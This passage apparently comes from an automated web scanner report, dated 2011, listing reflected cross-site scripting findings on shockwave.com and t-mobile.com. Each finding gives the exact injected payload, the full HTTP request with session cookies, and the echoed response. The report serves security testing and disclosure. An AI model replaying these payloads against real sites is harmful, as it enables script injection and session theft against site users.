Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Sun, 20 Mar 2011 12:34:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 20 Mar 2011 12:34:55 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 36098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.
...[SNIP]...
<link rel="canonical" href="http://www.shockwave.com/member7646f"><script>alert(1)</script>e4c58fa6589/avatarViewer.jsp" />
...[SNIP]...

1.232. http://www.shockwave.com/member/avatarViewer.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shockwave.com
Path:	/member/avatarViewer.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48e63"><script>alert(1)</script>ecdcc990455 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /member/avatarViewer.jsp48e63"><script>alert(1)</script>ecdcc990455?p=1&size=small&screenname=cbardezbain&mid=251037782 HTTP/1.1
Host: www.shockwave.com
Proxy-Connection: keep-alive
Referer: http://www.shockwave.com/home.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=adbHr0Y82SFkD9VaJqt7s; mbox=check#true#1300624515|session#1300624454318-408793#1300626315; s_pn=%2Fhome.jsp; s_ppv=0; s_nr=1300624454448; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Sun, 20 Mar 2011 12:35:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 20 Mar 2011 12:35:04 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 36098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.
...[SNIP]...
<link rel="canonical" href="http://www.shockwave.com/member/avatarViewer.jsp48e63"><script>alert(1)</script>ecdcc990455" />
...[SNIP]...

1.233. http://www.shockwave.com/online/all-games.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shockwave.com
Path:	/online/all-games.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36b60"><script>alert(1)</script>e6185996ec1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online36b60"><script>alert(1)</script>e6185996ec1/all-games.jsp HTTP/1.1
Host: www.shockwave.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=adbHr0Y82SFkD9VaJqt7s; __utmz=153495162.1300624455.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pn=%2Fmember%2FavatarViewer.jsp48e63%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eecdcc990455; s_sq=viashockwave%3D%2526pid%253D%25252Fhome.jsp%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.shockwave.com%25252Fhome.jsp%252523%2526ot%253DA; s_ppv=57; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D1607%253Bdemo%253D1306%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D847%253Bdemo%253D844%253Bdemo%253D792%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1300624454318-408793#1300626432|check#true#1300624632; s_cc=true; __cs_rr=1; s_nr=1300624572007; __utma=153495162.870092848.1300624455.1300624455.1300624455.1; mtvn_guid=1299937743-92; __utmc=153495162; __utmb=153495162.2.10.1300624455; __qca=P0-668179243-1300624455024;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Sun, 20 Mar 2011 14:00:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 20 Mar 2011 14:00:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.
...[SNIP]...
<link rel="canonical" href="http://www.shockwave.com/online36b60"><script>alert(1)</script>e6185996ec1/all-games.jsp" />
...[SNIP]...

1.234. http://www.shockwave.com/online/all-games.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shockwave.com
Path:	/online/all-games.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33ce9"><script>alert(1)</script>64d63a16cbf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online/all-games.jsp33ce9"><script>alert(1)</script>64d63a16cbf HTTP/1.1
Host: www.shockwave.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=adbHr0Y82SFkD9VaJqt7s; __utmz=153495162.1300624455.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pn=%2Fmember%2FavatarViewer.jsp48e63%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eecdcc990455; s_sq=viashockwave%3D%2526pid%253D%25252Fhome.jsp%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.shockwave.com%25252Fhome.jsp%252523%2526ot%253DA; s_ppv=57; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D1607%253Bdemo%253D1306%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D847%253Bdemo%253D844%253Bdemo%253D792%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1300624454318-408793#1300626432|check#true#1300624632; s_cc=true; __cs_rr=1; s_nr=1300624572007; __utma=153495162.870092848.1300624455.1300624455.1300624455.1; mtvn_guid=1299937743-92; __utmc=153495162; __utmb=153495162.2.10.1300624455; __qca=P0-668179243-1300624455024;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Sun, 20 Mar 2011 14:00:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 20 Mar 2011 14:00:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.
...[SNIP]...
<link rel="canonical" href="http://www.shockwave.com/online/all-games.jsp33ce9"><script>alert(1)</script>64d63a16cbf" />
...[SNIP]...

1.235. http://www.shockwave.com/search.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shockwave.com
Path:	/search.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d7cd"><script>alert(1)</script>0bcf4403adf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.jsp4d7cd"><script>alert(1)</script>0bcf4403adf HTTP/1.1
Host: www.shockwave.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=adbHr0Y82SFkD9VaJqt7s; __utmz=153495162.1300624455.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pn=%2Fmember%2FavatarViewer.jsp48e63%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eecdcc990455; s_sq=viashockwave%3D%2526pid%253D%25252Fhome.jsp%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.shockwave.com%25252Fhome.jsp%252523%2526ot%253DA; s_ppv=57; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D1607%253Bdemo%253D1306%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D847%253Bdemo%253D844%253Bdemo%253D792%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1300624454318-408793#1300626432|check#true#1300624632; s_cc=true; __cs_rr=1; s_nr=1300624572007; __utma=153495162.870092848.1300624455.1300624455.1300624455.1; mtvn_guid=1299937743-92; __utmc=153495162; __utmb=153495162.2.10.1300624455; __qca=P0-668179243-1300624455024;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Sun, 20 Mar 2011 14:00:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 20 Mar 2011 14:00:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.
...[SNIP]...
<link rel="canonical" href="http://www.shockwave.com/search.jsp4d7cd"><script>alert(1)</script>0bcf4403adf" />
...[SNIP]...

1.236. http://www.t-mobile.com//htmlservices/navigation/TMobileNavigation.ashx [currentURL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	//htmlservices/navigation/TMobileNavigation.ashx

Issue detail

The value of the currentURL request parameter is copied into the HTML document as plain text between tags. The payload fc850<img%20src%3da%20onerror%3dalert(1)>402b33ad27f was submitted in the currentURL parameter. This input was echoed as fc850<img src=a onerror=alert(1)>402b33ad27f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET //htmlservices/navigation/TMobileNavigation.ashx?func=tmo&appId=LOCATOR&supportspanish=true&section=support&currentURL=http%3A//locator.t-mobile.com/Locator.aspxfc850<img%20src%3da%20onerror%3dalert(1)>402b33ad27f&format=json&jsoncallback=jsonp1300627102165&_=1300627102412 HTTP/1.1
Host: www.t-mobile.com
Proxy-Connection: keep-alive
Referer: http://locator.t-mobile.com/Locator.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMobileCommon=TeaId=d676b058-7b88-48e0-a1a7-a54f7fb0806d; ASP.NET_SessionId=qquvpt55xmlorbb04afdz055; TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; cmTPSet=Y; mbox=PC#1300624507874-511379.17#1301836695|check#true#1300627155|session#1300627094627-816279#1300628955; mr_referredVisitor=0; TMobileSpanish=IsSpanishUser=false; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300616298452:ss=1300616298452; TMobileSession=WT=&DCS=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Date: Sun, 20 Mar 2011 13:34:26 GMT
Content-Length: 27474

jsonp1300627102165({"HeaderHTML":"<script charset=\"utf-8\" type=\"text/javascript\"> var mytmoUrl='https://my.t-mobile.com/Login/LoginController.aspx';<\/script><div><div id=\"brand\"><div id=\"logo\
...[SNIP]...
<a href=\"http://es.t-mobile.com/enes/sdlocator/locator.aspxfc850<img src=a onerror=alert(1)>402b33ad27f\" onclick=\"tm_spanish_setCookie('TMobileSpanish', 'IsSpanishUser=true');\">
...[SNIP]...

1.237. http://www.t-mobile.com/Company/Community.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/Company/Community.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60361"style%3d"x%3aexpression(alert(1))"7d835e822c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60361"style="x:expression(alert(1))"7d835e822c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Company/Community.aspx?60361"style%3d"x%3aexpression(alert(1))"7d835e822c8=1 HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; fsr.s={"v":1,"rid":"1300628812323_364495","ru":"http://burp/show/20","r":"burp","st":"","pv":2,"to":5,"c":"http://www.t-mobile.com/shop/phones/Default.aspx","lc":{"d4":{"v":2,"s":false}},"cd":4,"sd":4,"f":1300628818187}; TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; PartnerExpiration=; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; 53643872-SKEY=4772067767537568202; fsr.a=1300628846480; TMobileCommon=TeaId=d676b058-7b88-48e0-a1a7-a54f7fb0806d; TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; TMobilePartner=; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; HumanClickSiteContainerID_53643872=STANDALONE; cmTPSet=Y; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; ASP.NET_SessionId=qquvpt55xmlorbb04afdz055; TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerExpiration=PARTNER=!4%2f3%2f2011+2%3a00%3a39+PM; domain=.t-mobile.com; expires=Tue, 20-Mar-2012 14:00:39 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:00:39 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:00:39 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; domain=.t-mobile.com; path=/
Date: Sun, 20 Mar 2011 14:00:39 GMT
Connection: close
Content-Length: 39716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
<a class="tablink" href="/Company/Community.aspx?tp=Abt_Tab_Safety&60361"style="x:expression(alert(1))"7d835e822c8=1">
...[SNIP]...

1.238. http://www.t-mobile.com/Company/PrivacyResources.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/Company/PrivacyResources.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31303"style%3d"x%3aexpression(alert(1))"0dade3d0bc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 31303"style="x:expression(alert(1))"0dade3d0bc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Company/PrivacyResources.aspx?31303"style%3d"x%3aexpression(alert(1))"0dade3d0bc2=1 HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; fsr.s={"v":1,"rid":"1300628812323_364495","ru":"http://burp/show/20","r":"burp","st":"","pv":2,"to":5,"c":"http://www.t-mobile.com/shop/phones/Default.aspx","lc":{"d4":{"v":2,"s":false}},"cd":4,"sd":4,"f":1300628818187}; TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; PartnerExpiration=; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; 53643872-SKEY=4772067767537568202; fsr.a=1300628846480; TMobileCommon=TeaId=d676b058-7b88-48e0-a1a7-a54f7fb0806d; TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; TMobilePartner=; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; HumanClickSiteContainerID_53643872=STANDALONE; cmTPSet=Y; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; ASP.NET_SessionId=qquvpt55xmlorbb04afdz055; TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerExpiration=PARTNER=!4%2f3%2f2011+2%3a00%3a41+PM; domain=.t-mobile.com; expires=Tue, 20-Mar-2012 14:00:41 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:00:41 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:00:41 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; domain=.t-mobile.com; path=/
Date: Sun, 20 Mar 2011 14:00:40 GMT
Connection: close
Content-Length: 41995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
<a class="tablink" href="/Company/PrivacyResources.aspx?tp=Abt_Tab_AccountSecurity&31303"style="x:expression(alert(1))"0dade3d0bc2=1">
...[SNIP]...

1.239. http://www.t-mobile.com/Company/Working.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/Company/Working.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45c90"style%3d"x%3aexpression(alert(1))"72b9b7097f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45c90"style="x:expression(alert(1))"72b9b7097f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Company/Working.aspx?45c90"style%3d"x%3aexpression(alert(1))"72b9b7097f2=1 HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; fsr.s={"v":1,"rid":"1300628812323_364495","ru":"http://burp/show/20","r":"burp","st":"","pv":2,"to":5,"c":"http://www.t-mobile.com/shop/phones/Default.aspx","lc":{"d4":{"v":2,"s":false}},"cd":4,"sd":4,"f":1300628818187}; TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; PartnerExpiration=; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; 53643872-SKEY=4772067767537568202; fsr.a=1300628846480; TMobileCommon=TeaId=d676b058-7b88-48e0-a1a7-a54f7fb0806d; TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; TMobilePartner=; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; HumanClickSiteContainerID_53643872=STANDALONE; cmTPSet=Y; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; ASP.NET_SessionId=qquvpt55xmlorbb04afdz055; TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerExpiration=PARTNER=!4%2f3%2f2011+2%3a00%3a42+PM; domain=.t-mobile.com; expires=Tue, 20-Mar-2012 14:00:42 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:00:42 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:00:42 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; domain=.t-mobile.com; path=/
Date: Sun, 20 Mar 2011 14:00:41 GMT
Connection: close
Content-Length: 40513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
<a class="tablink" href="/Company/Working.aspx?tp=Abt_Tab_Bidding&45c90"style="x:expression(alert(1))"72b9b7097f2=1">
...[SNIP]...

1.240. http://www.t-mobile.com/business/Information.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/business/Information.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60c04"style%3d"x%3aexpression(alert(1))"72ceeb5d2f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60c04"style="x:expression(alert(1))"72ceeb5d2f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/Information.aspx?60c04"style%3d"x%3aexpression(alert(1))"72ceeb5d2f5=1 HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; fsr.s={"v":1,"rid":"1300628812323_364495","ru":"http://burp/show/20","r":"burp","st":"","pv":2,"to":5,"c":"http://www.t-mobile.com/shop/phones/Default.aspx","lc":{"d4":{"v":2,"s":false}},"cd":4,"sd":4,"f":1300628818187}; TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; PartnerExpiration=; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; 53643872-SKEY=4772067767537568202; fsr.a=1300628846480; TMobileCommon=TeaId=d676b058-7b88-48e0-a1a7-a54f7fb0806d; TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; TMobilePartner=; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; HumanClickSiteContainerID_53643872=STANDALONE; cmTPSet=Y; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; ASP.NET_SessionId=qquvpt55xmlorbb04afdz055; TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerExpiration=PARTNER=!4%2f3%2f2011+2%3a00%3a58+PM; domain=.t-mobile.com; expires=Tue, 20-Mar-2012 14:00:58 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:00:58 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:00:58 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; domain=.t-mobile.com; path=/
Date: Sun, 20 Mar 2011 14:00:57 GMT
Connection: close
